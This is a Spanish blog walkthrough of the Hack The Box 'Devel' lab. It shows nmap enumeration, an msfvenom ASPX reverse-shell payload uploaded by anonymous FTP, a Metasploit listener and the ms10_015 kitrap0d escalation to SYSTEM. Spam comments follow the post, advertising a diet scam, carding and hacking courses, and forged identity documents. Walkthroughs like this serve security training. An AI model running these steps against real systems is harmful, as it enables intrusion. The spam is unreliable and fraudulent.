HTB - Devel walkthrough -
En este post les mostrare los pasos para completar el challenge devel de hack the box, el cual para mí me pareció muy bueno. Estoy practicando con maquinas Windows ya que quiero mejorar mis técnicas en estos OS debido a que hay mucho que aprender. Esta como veremos es bastante básica pero interesante a la vez, empecemos.
Enumeración
Primero empezamos enumerando los puertos y servicios de nuestro objetivo. Para eso uso Nmap con el siguiente comando.
> nmap -sC -sV 10.10.10.5
Como podemos ver tenemos el puerto 21 abierto el cual esta corriendo el servicio FTP y este tiene habilitado el Anonymous log-in. A la vez nos muestra un directorio y varios archivos (al archivo sha4rk.aspx es de cuándo estaba haciendo la maquina). También vemos que tenemos el puerto 80 abierto corriendo IIS.
Algo que note de la primera es que esta es la plantilla default que sale cuando corremos por primera vez nuestro server IIS, y si bien recordamos este archivo lo podemos ver en el FTP output junto con la imagen llamada welcome.png. Esto quiere decir que el servicio IIS esta ejecutando los archivos de ese directorio, por lo tanto podríamos intentar ejecutar una shell desde nuestro navegador. Para esto debemos crear una shell con la extension .aspx y intentar subirla mediante el servicio FTP.
Exploitation
Para crear nuestra shell usamos msfvenom de esta manera.
> msfvenom -p windows/meterpreter/reverse_tcp LHOST="Tu-Ip" LPORT="puerto de escucha" -f aspx -o sh4rk.aspx
Una vez tengamos nuestra reverse shell pasamos a conectamos por ftp con el user anonymous y un password random.
Usamos put junto al nombre de nuestra shell para subirla al servidor. Verificamos que esta haya subido y ahora pasamos a configurar nuestro listener con metasploit.
> msfconsole
>use multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
Una vez configuremos nuestra ip y puerto de escucha vamos al navegador y ejecutamos nuestra shell.
>http://10.10.10.5/sh4rk.aspx
y como vemos en la imagen de arriba tendremos nuestra meterpreter.
Post-Exploitation
Ahora pasaríamos a intentar elevar privilegios para tener mayor control nuestra maquina víctima. En nuestra meterpreter corremos el comando backgound para dejar nuestra sección abierta.
> search suggest
Cómo podemos ver el que nos interesa en este caso es el numero 3, ya que estamos buscando exploit de manera local en nuestra maquina. Vemos las opciones y solo nos pide la sección de nuestra meterpreter, en mi caso era la 2.
Una vez se me mostró esta lista antes de tirar balas locas (probarlos todos a lo loco) busque en mi navegador por el Id de cada una y la mas que me convenía en muestro caso era el ms10_015, ya este exploit nos abriría otra sesión como SYSTEM. en mi caso esta fue la que use.
> use exploit/windows/local/ms10_015_kitrap0d
Bomm, si escribimos "whoami" podremos ver que ya somos system y solo faltaría pasar a leer los flags user.txt y root.txt.
Espero que les sea de ayuda este post, si quieren mas post sobre walkthrough solo comenten del nombre del challenge que desean. Compartan, para dudas y preguntas me escriben por Twitter.
Easy "water hack" burns 2 lbs OVERNIGHT
ResponderBorrarOver 160 000 men and women are using a easy and secret "liquids hack" to drop 1-2 lbs every night while they sleep.
It is very simple and works every time.
This is how to do it yourself:
1) Get a glass and fill it up with water half full
2) Then learn this proven hack
and be 1-2 lbs thinner in the morning!
Hello W0rld
ResponderBorrarI’m offering Hacking / carding short courses that you can learn in 1 hour to 2 hours.
You don't need to spend a lot of money on so-called fake hackers and fake products,
fake services money transfer, credit score and loans. Hack anything your own via
Android / IOS no need hi-speed computer nor required any IT special skills. Course
are available in Video and text formate also guide privately on localhost with practice.
courses are mentioned :
* Android / IOS hacking
* Cybersecurity landscape
* Network cybersecurity attacks – management and
monitoring
* Malware and advanced persistent threats
* Bank Account Hacking
* Credit card hacking
* Social Media Accounts
* Password stealing
* Carding course online / Offline including VPS / RDP
* Credit Card checker + Balance inquiry
Beside courses I’m sharing with new and upcoming leaks
In hacking world.
Contact info:
DsLeakS@gmail.com
We produce only high-quality Registered Passports, ID Cards, Driver’s License, IELTS Certificate, VISA’s, Resident Permit, Birth Certificate, Diplomas SSN, TOEFL, Exit/Entry Stamps, etc that can be used legally both nationally and internationally. It will be produce with 100% authenticity like the original documents. We also use new biometric technologies for all types of our documents.
ResponderBorrarDocuments duplicate service:
Documents duplicates producing means we will clone real existing documents and replace the information's with your provided details to suit your activities, database considering on your age, sex, nationality, etc. It will contain real name of parents of the person, address, some other useful information which can be asked at the airport and customs by immigration, ect.
Documents registration service:
For some Countries we can offer to register your new documents in the government database after it will be produced. In fact it will be the official issued documents and you can use it like the original ones. But the price for registered documents will be higher than for the regular documents producing.
Visa/Stamps Affixion Service:
We provide a possibility to affix almost all kind of stamps/VISAs into the passports to fill you more confident. We don't provide this kind of service separately from passport producing.
IELTS Certificates:
We offer high qualitative English test certificates without exam. Certificates will be original and registered in official database. All certificates we issue carries a band scores level of your choosing (6.5-9.0). IELTS is accepted by more than 10,000 organizations in over 145 countries.
This includes:
Universities, Schools, Training Colleges and Tertiary Institutes
Government departments and agencies
Professional and industry bodies
Companies and employers.
Contact:
Wickr ID:::::::::: Spidoplug
Email:::::::::::::: firstclassdocuments20@gmail.com
Website:::::::::::www.documentsonline.store